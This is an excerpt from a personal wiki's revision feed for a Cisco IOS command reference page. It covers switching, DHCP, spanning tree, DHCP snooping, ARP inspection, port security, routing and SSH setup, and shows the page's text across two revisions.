  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1120</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1120"/>
		<updated>2026-02-23T22:35:29Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure a Default Route / Default Gateway */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
